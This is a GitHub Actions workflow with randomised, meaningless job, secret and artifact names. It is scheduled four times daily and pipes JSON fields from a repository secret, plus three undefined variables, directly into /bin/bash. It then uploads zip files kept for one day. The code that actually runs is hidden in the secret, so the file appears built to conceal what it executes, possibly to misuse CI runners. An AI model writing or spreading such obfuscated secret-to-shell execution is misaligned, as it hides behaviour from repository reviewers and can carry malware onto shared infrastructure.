name: kongbaoxutie
on:
  workflow_dispatch:

  schedule:
    - cron: '10 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kongbaoxutie
        env:
          rmjec59301: ${{ secrets.rmjec59301 }}
        run: |
          printf '%s' "$rmjec59301" | jq -r .zj4 | /bin/bash
          echo $fmxq19 | jq -r .y86 | /bin/bash
          printf '%s' "$l6452" | jq -r .rmy5 | /bin/bash
          printf '%s' "$wf322" | jq -r .pkuye4 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ldmGQlsM
          path: "*.zip"
          retention-days: 1
